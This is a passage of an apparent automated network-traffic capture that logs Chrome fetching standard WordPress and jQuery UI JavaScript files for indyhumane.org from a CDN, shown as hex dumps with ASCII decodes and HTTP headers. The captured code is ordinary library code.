                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 74 2e 75 6e 69 71 75 65 49 64 28 29 2e 61 74 74 72 28 7b 72 6f 6c 65 3a 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 72 6f 6c 65 2c 74 61 62 49 6e 64 65 78 3a 30 7d 29 2c 74 68 69 73 2e 5f 61 64 64 43 6c 61 73 73 28 22 75 69 2d 6d 65 6e 75 22 2c 22 75 69 2d 77 69 64 67 65 74 20 75 69 2d 77 69 64 67 65 74 2d 63 6f 6e 74 65 6e 74 22 29 2c 74 68 69 73 2e 5f 6f 6e 28 7b 22 6d 6f 75 73 65 64 6f 77 6e 20 2e 75 69 2d 6d 65 6e 75 2d 69 74 65 6d 22 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 74 68 69 73 2e 5f 61 63 74 69 76 61 74 65 49 74 65 6d 28 65 29 7d 2c 22 63 6c 69 63 6b 20 2e 75 69 2d 6d 65 6e 75 2d 69 74 65 6d 22 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 61 28 65 2e 74 61 72 67 65 74 29 2c 69 3d
                                                                                                                                                                                                                                                        Data Ascii: t.uniqueId().attr({role:this.options.role,tabIndex:0}),this._addClass("ui-menu","ui-widget ui-widget-content"),this._on({"mousedown .ui-menu-item":function(e){e.preventDefault(),this._activateItem(e)},"click .ui-menu-item":function(e){var t=a(e.target),i=
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 65 6e 75 2d 69 74 65 6d 22 29 2c 69 3d 61 28 65 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 29 2c 74 5b 30 5d 21 3d 3d 69 5b 30 5d 29 7c 7c 69 2e 69 73 28 22 2e 75 69 2d 73 74 61 74 65 2d 61 63 74 69 76 65 22 29 7c 7c 28 74 68 69 73 2e 5f 72 65 6d 6f 76 65 43 6c 61 73 73 28 69 2e 73 69 62 6c 69 6e 67 73 28 29 2e 63 68 69 6c 64 72 65 6e 28 22 2e 75 69 2d 73 74 61 74 65 2d 61 63 74 69 76 65 22 29 2c 6e 75 6c 6c 2c 22 75 69 2d 73 74 61 74 65 2d 61 63 74 69 76 65 22 29 2c 74 68 69 73 2e 66 6f 63 75 73 28 65 2c 69 29 29 7d 2c 5f 64 65 73 74 72 6f 79 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2e 66 69 6e 64 28 22 2e 75 69 2d 6d 65 6e 75 2d 69 74 65 6d 22 29 2e 72 65 6d 6f 76 65 41 74 74 72 28 22 72 6f 6c 65 20 61 72
                                                                                                                                                                                                                                                        Data Ascii: enu-item"),i=a(e.currentTarget),t[0]!==i[0])||i.is(".ui-state-active")||(this._removeClass(i.siblings().children(".ui-state-active"),null,"ui-state-active"),this.focus(e,i))},_destroy:function(){var e=this.element.find(".ui-menu-item").removeAttr("role ar
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 68 61 72 43 6f 64 65 28 65 2e 6b 65 79 43 6f 64 65 29 2c 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 74 68 69 73 2e 66 69 6c 74 65 72 54 69 6d 65 72 29 2c 69 3d 3d 3d 74 3f 73 3d 21 30 3a 69 3d 74 2b 69 2c 74 3d 74 68 69 73 2e 5f 66 69 6c 74 65 72 4d 65 6e 75 49 74 65 6d 73 28 69 29 2c 28 74 3d 73 26 26 2d 31 21 3d 3d 74 2e 69 6e 64 65 78 28 74 68 69 73 2e 61 63 74 69 76 65 2e 6e 65 78 74 28 29 29 3f 74 68 69 73 2e 61 63 74 69 76 65 2e 6e 65 78 74 41 6c 6c 28 22 2e 75 69 2d 6d 65 6e 75 2d 69 74 65 6d 22 29 3a 74 29 2e 6c 65 6e 67 74 68 7c 7c 28 69 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 65 2e 6b 65 79 43 6f 64 65 29 2c 74 3d 74 68 69 73 2e 5f 66 69 6c 74 65 72 4d 65 6e 75 49 74 65 6d 73 28 69 29 29 2c 74 2e 6c 65 6e 67 74 68 3f 28 74 68
                                                                                                                                                                                                                                                        Data Ascii: harCode(e.keyCode),clearTimeout(this.filterTimer),i===t?s=!0:i=t+i,t=this._filterMenuItems(i),(t=s&&-1!==t.index(this.active.next())?this.active.nextAll(".ui-menu-item"):t).length||(i=String.fromCharCode(e.keyCode),t=this._filterMenuItems(i)),t.length?(th
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 2e 63 68 69 6c 64 72 65 6e 28 29 2e 6e 6f 74 28 22 2e 75 69 2d 6d 65 6e 75 22 29 2e 75 6e 69 71 75 65 49 64 28 29 2e 61 74 74 72 28 7b 74 61 62 49 6e 64 65 78 3a 2d 31 2c 72 6f 6c 65 3a 74 68 69 73 2e 5f 69 74 65 6d 52 6f 6c 65 28 29 7d 29 2c 74 68 69 73 2e 5f 61 64 64 43 6c 61 73 73 28 69 2c 22 75 69 2d 6d 65 6e 75 2d 69 74 65 6d 22 29 2e 5f 61 64 64 43 6c 61 73 73 28 74 2c 22 75 69 2d 6d 65 6e 75 2d 69 74 65 6d 2d 77 72 61 70 70 65 72 22 29 2c 65 2e 66 69 6c 74 65 72 28 22 2e 75 69 2d 73 74 61 74 65 2d 64 69 73 61 62 6c 65 64 22 29 2e 61 74 74 72 28 22 61 72 69 61 2d 64 69 73 61 62 6c 65 64 22 2c 22 74 72 75 65 22 29 2c 74 68 69 73 2e 61 63 74 69 76 65 26 26 21 61 2e 63 6f 6e 74 61 69 6e 73 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 5b 30 5d 2c 74 68 69 73
                                                                                                                                                                                                                                                        Data Ascii: .children().not(".ui-menu").uniqueId().attr({tabIndex:-1,role:this._itemRole()}),this._addClass(i,"ui-menu-item")._addClass(t,"ui-menu-item-wrapper"),e.filter(".ui-state-disabled").attr("aria-disabled","true"),this.active&&!a.contains(this.element[0],this
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 6f 6c 6c 28 29 26 26 28 74 3d 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 63 73 73 28 74 68 69 73 2e 61 63 74 69 76 65 4d 65 6e 75 5b 30 5d 2c 22 62 6f 72 64 65 72 54 6f 70 57 69 64 74 68 22 29 29 7c 7c 30 2c 69 3d 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 63 73 73 28 74 68 69 73 2e 61 63 74 69 76 65 4d 65 6e 75 5b 30 5d 2c 22 70 61 64 64 69 6e 67 54 6f 70 22 29 29 7c 7c 30 2c 74 3d 65 2e 6f 66 66 73 65 74 28 29 2e 74 6f 70 2d 74 68 69 73 2e 61 63 74 69 76 65 4d 65 6e 75 2e 6f 66 66 73 65 74 28 29 2e 74 6f 70 2d 74 2d 69 2c 69 3d 74 68 69 73 2e 61 63 74 69 76 65 4d 65 6e 75 2e 73 63 72 6f 6c 6c 54 6f 70 28 29 2c 73 3d 74 68 69 73 2e 61 63 74 69 76 65 4d 65 6e 75 2e 68 65 69 67 68 74 28 29 2c 65 3d 65 2e 6f 75 74 65 72 48 65 69 67 68 74 28 29 2c 74 3c 30 3f 74 68
                                                                                                                                                                                                                                                        Data Ascii: oll()&&(t=parseFloat(a.css(this.activeMenu[0],"borderTopWidth"))||0,i=parseFloat(a.css(this.activeMenu[0],"paddingTop"))||0,t=e.offset().top-this.activeMenu.offset().top-t-i,i=this.activeMenu.scrollTop(),s=this.activeMenu.height(),e=e.outerHeight(),t<0?th
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 2d 6d 65 6e 75 22 29 2e 68 69 64 65 28 29 2e 61 74 74 72 28 22 61 72 69 61 2d 68 69 64 64 65 6e 22 2c 22 74 72 75 65 22 29 2e 61 74 74 72 28 22 61 72 69 61 2d 65 78 70 61 6e 64 65 64 22 2c 22 66 61 6c 73 65 22 29 7d 2c 5f 63 6c 6f 73 65 4f 6e 44 6f 63 75 6d 65 6e 74 43 6c 69 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 61 28 65 2e 74 61 72 67 65 74 29 2e 63 6c 6f 73 65 73 74 28 22 2e 75 69 2d 6d 65 6e 75 22 29 2e 6c 65 6e 67 74 68 7d 2c 5f 69 73 44 69 76 69 64 65 72 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 2f 5b 5e 5c 2d 5c 75 32 30 31 34 5c 75 32 30 31 33 5c 73 5d 2f 2e 74 65 73 74 28 65 2e 74 65 78 74 28 29 29 7d 2c 63 6f 6c 6c 61 70 73 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 61
                                                                                                                                                                                                                                                        Data Ascii: -menu").hide().attr("aria-hidden","true").attr("aria-expanded","false")},_closeOnDocumentClick:function(e){return!a(e.target).closest(".ui-menu").length},_isDivider:function(e){return!/[^\-\u2014\u2013\s]/.test(e.text())},collapse:function(e){var t=this.a
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1244INData Raw: 5b 30 5d 2e 6f 66 66 73 65 74 48 65 69 67 68 74 2d 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2e 6f 75 74 65 72 48 65 69 67 68 74 28 29 29 2c 74 68 69 73 2e 61 63 74 69 76 65 2e 6e 65 78 74 41 6c 6c 28 22 2e 75 69 2d 6d 65 6e 75 2d 69 74 65 6d 22 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 28 74 3d 61 28 74 68 69 73 29 29 2e 6f 66 66 73 65 74 28 29 2e 74 6f 70 2d 69 2d 73 3c 30 7d 29 2c 74 68 69 73 2e 66 6f 63 75 73 28 65 2c 74 29 29 3a 74 68 69 73 2e 66 6f 63 75 73 28 65 2c 74 68 69 73 2e 5f 6d 65 6e 75 49 74 65 6d 73 28 74 68 69 73 2e 61 63 74 69 76 65 4d 65 6e 75 29 5b 74 68 69 73 2e 61 63 74 69 76 65 3f 22 6c 61 73 74 22 3a 22 66 69 72 73 74 22 5d 28 29 29 29 3a 74 68 69 73 2e 6e 65 78 74 28 65 29 7d 2c 70 72 65 76 69 6f 75 73 50
                                                                                                                                                                                                                                                        Data Ascii: [0].offsetHeight-this.element.outerHeight()),this.active.nextAll(".ui-menu-item").each(function(){return(t=a(this)).offset().top-i-s<0}),this.focus(e,t)):this.focus(e,this._menuItems(this.activeMenu)[this.active?"last":"first"]())):this.next(e)},previousP


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        12192.168.2.449762192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC588OUTGET /wp-includes/js/dist/dom-ready.min.js?ver=f77871ff7694fffea381 HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC603INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:10 GMT
                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                        Content-Length: 457
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-includes/js/dist/dom-ready.min.js>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Wed, 31 Jan 2024 12:59:56 GMT
                                                                                                                                                                                                                                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=315360000
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 2.jfk _atomic_dca MISS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: MISS jfk 2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC457INData Raw: 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 7b 64 3a 28 74 2c 64 29 3d 3e 7b 66 6f 72 28 76 61 72 20 6f 20 69 6e 20 64 29 65 2e 6f 28 64 2c 6f 29 26 26 21 65 2e 6f 28 74 2c 6f 29 26 26 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 6f 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 64 5b 6f 5d 7d 29 7d 2c 6f 3a 28 65 2c 74 29 3d 3e 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 65 2c 74 29 7d 2c 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 64 28 65 29 7b 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 64 6f 63 75
                                                                                                                                                                                                                                                        Data Ascii: /*! This file is auto-generated */(()=>{"use strict";var e={d:(t,d)=>{for(var o in d)e.o(d,o)&&!e.o(t,o)&&Object.defineProperty(t,o,{enumerable:!0,get:d[o]})},o:(e,t)=>Object.prototype.hasOwnProperty.call(e,t)},t={};function d(e){"undefined"!=typeof docu


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        13192.168.2.449763192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC584OUTGET /wp-includes/js/dist/hooks.min.js?ver=4d63a3d491d11ffd8ac6 HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC623INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:10 GMT
                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                        Content-Length: 4776
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-includes/js/dist/hooks.min.js>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Mon, 30 Sep 2024 05:11:31 GMT
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=315360000
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 1.jfk _atomic_dca MISS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: MISS jfk 2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC746INData Raw: 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 74 3d 7b 64 3a 28 65 2c 6e 29 3d 3e 7b 66 6f 72 28 76 61 72 20 72 20 69 6e 20 6e 29 74 2e 6f 28 6e 2c 72 29 26 26 21 74 2e 6f 28 65 2c 72 29 26 26 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 72 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 6e 5b 72 5d 7d 29 7d 2c 6f 3a 28 74 2c 65 29 3d 3e 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 74 2c 65 29 2c 72 3a 74 3d 3e 7b 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 53 79 6d 62 6f 6c 2e 74 6f 53
                                                                                                                                                                                                                                                        Data Ascii: /*! This file is auto-generated */(()=>{"use strict";var t={d:(e,n)=>{for(var r in n)t.o(n,r)&&!t.o(e,r)&&Object.defineProperty(e,r,{enumerable:!0,get:n[r]})},o:(t,e)=>Object.prototype.hasOwnProperty.call(t,e),r:t=>{"undefined"!=typeof Symbol&&Symbol.toS
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 3a 28 29 3d 3e 46 2c 72 65 6d 6f 76 65 41 6c 6c 46 69 6c 74 65 72 73 3a 28 29 3d 3e 62 2c 72 65 6d 6f 76 65 46 69 6c 74 65 72 3a 28 29 3d 3e 79 7d 29 3b 63 6f 6e 73 74 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 74 7c 7c 22 22 3d 3d 3d 74 3f 28 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 22 54 68 65 20 6e 61 6d 65 73 70 61 63 65 20 6d 75 73 74 20 62 65 20 61 20 6e 6f 6e 2d 65 6d 70 74 79 20 73 74 72 69 6e 67 2e 22 29 2c 21 31 29 3a 21 21 2f 5e 5b 61 2d 7a 41 2d 5a 5d 5b 61 2d 7a 41 2d 5a 30 2d 39 5f 2e 5c 2d 5c 2f 5d 2a 24 2f 2e 74 65 73 74 28 74 29 7c 7c 28 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 22 54 68 65 20 6e 61 6d 65 73 70 61 63 65 20 63 61 6e 20 6f 6e 6c 79 20 63 6f 6e 74 61 69
                                                                                                                                                                                                                                                        Data Ascii: :()=>F,removeAllFilters:()=>b,removeFilter:()=>y});const n=function(t){return"string"!=typeof t||""===t?(console.error("The namespace must be a non-empty string."),!1):!!/^[a-zA-Z][a-zA-Z0-9_.\-\/]*$/.test(t)||(console.error("The namespace can only contai
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 21 63 5b 69 5d 29 72 65 74 75 72 6e 20 30 3b 6c 65 74 20 6c 3d 30 3b 69 66 28 6f 29 6c 3d 63 5b 69 5d 2e 68 61 6e 64 6c 65 72 73 2e 6c 65 6e 67 74 68 2c 63 5b 69 5d 3d 7b 72 75 6e 73 3a 63 5b 69 5d 2e 72 75 6e 73 2c 68 61 6e 64 6c 65 72 73 3a 5b 5d 7d 3b 65 6c 73 65 7b 63 6f 6e 73 74 20 74 3d 63 5b 69 5d 2e 68 61 6e 64 6c 65 72 73 3b 66 6f 72 28 6c 65 74 20 65 3d 74 2e 6c 65 6e 67 74 68 2d 31 3b 65 3e 3d 30 3b 65 2d 2d 29 74 5b 65 5d 2e 6e 61 6d 65 73 70 61 63 65 3d 3d 3d 73 26 26 28 74 2e 73 70 6c 69 63 65 28 65 2c 31 29 2c 6c 2b 2b 2c 63 2e 5f 5f 63 75 72 72 65 6e 74 2e 66 6f 72 45 61 63 68 28 28 74 3d 3e 7b 74 2e 6e 61 6d 65 3d 3d 3d 69 26 26 74 2e 63 75 72 72 65 6e 74 49 6e 64 65 78 3e 3d 65 26 26 74 2e 63 75 72 72 65 6e 74 49 6e 64 65 78 2d 2d 7d 29
                                                                                                                                                                                                                                                        Data Ascii: !c[i])return 0;let l=0;if(o)l=c[i].handlers.length,c[i]={runs:c[i].runs,handlers:[]};else{const t=c[i].handlers;for(let e=t.length-1;e>=0;e--)t[e].namespace===s&&(t.splice(e,1),l++,c.__current.forEach((t=>{t.name===i&&t.currentIndex>=e&&t.currentIndex--})
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1292INData Raw: 3d 3d 3d 6e 29 29 7d 7d 3b 63 6f 6e 73 74 20 75 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 63 6f 6e 73 74 20 6f 3d 74 5b 65 5d 3b 69 66 28 72 28 6e 29 29 72 65 74 75 72 6e 20 6f 5b 6e 5d 26 26 6f 5b 6e 5d 2e 72 75 6e 73 3f 6f 5b 6e 5d 2e 72 75 6e 73 3a 30 7d 7d 3b 63 6c 61 73 73 20 64 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 7b 74 68 69 73 2e 61 63 74 69 6f 6e 73 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 6e 75 6c 6c 29 2c 74 68 69 73 2e 61 63 74 69 6f 6e 73 2e 5f 5f 63 75 72 72 65 6e 74 3d 6e 65 77 20 53 65 74 2c 74 68 69 73 2e 66 69 6c 74 65 72 73 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 6e 75 6c 6c 29 2c 74 68 69 73 2e 66 69 6c 74 65 72 73 2e 5f 5f 63 75 72 72 65 6e 74 3d 6e 65 77 20 53
                                                                                                                                                                                                                                                        Data Ascii: ===n))}};const u=function(t,e){return function(n){const o=t[e];if(r(n))return o[n]&&o[n].runs?o[n].runs:0}};class d{constructor(){this.actions=Object.create(null),this.actions.__current=new Set,this.filters=Object.create(null),this.filters.__current=new S


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        14192.168.2.449766192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC583OUTGET /wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e6 HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC622INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:10 GMT
                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                        Content-Length: 9141
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-includes/js/dist/i18n.min.js>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Thu, 15 Feb 2024 16:53:15 GMT
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=315360000
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 1.jfk _atomic_dca MISS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: MISS jfk 2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC747INData Raw: 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 28 28 29 3d 3e 7b 76 61 72 20 74 3d 7b 32 30 35 38 3a 28 74 2c 65 2c 72 29 3d 3e 7b 76 61 72 20 6e 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 69 3d 7b 6e 6f 74 5f 73 74 72 69 6e 67 3a 2f 5b 5e 73 5d 2f 2c 6e 6f 74 5f 62 6f 6f 6c 3a 2f 5b 5e 74 5d 2f 2c 6e 6f 74 5f 74 79 70 65 3a 2f 5b 5e 54 5d 2f 2c 6e 6f 74 5f 70 72 69 6d 69 74 69 76 65 3a 2f 5b 5e 76 5d 2f 2c 6e 75 6d 62 65 72 3a 2f 5b 64 69 65 66 67 5d 2f 2c 6e 75 6d 65 72 69 63 5f 61 72 67 3a 2f 5b 62 63 64 69 65 66 67 75 78 58 5d 2f 2c 6a 73 6f 6e 3a 2f 5b 6a 5d 2f 2c 6e 6f 74 5f 6a 73 6f 6e 3a 2f 5b 5e 6a 5d 2f 2c 74 65 78 74 3a 2f 5e 5b 5e 5c 78 32
                                                                                                                                                                                                                                                        Data Ascii: /*! This file is auto-generated */(()=>{var t={2058:(t,e,r)=>{var n;!function(){"use strict";var i={not_string:/[^s]/,not_bool:/[^t]/,not_type:/[^T]/,not_primitive:/[^v]/,number:/[diefg]/,numeric_arg:/[bcdiefguxX]/,json:/[j]/,not_json:/[^j]/,text:/^[^\x2
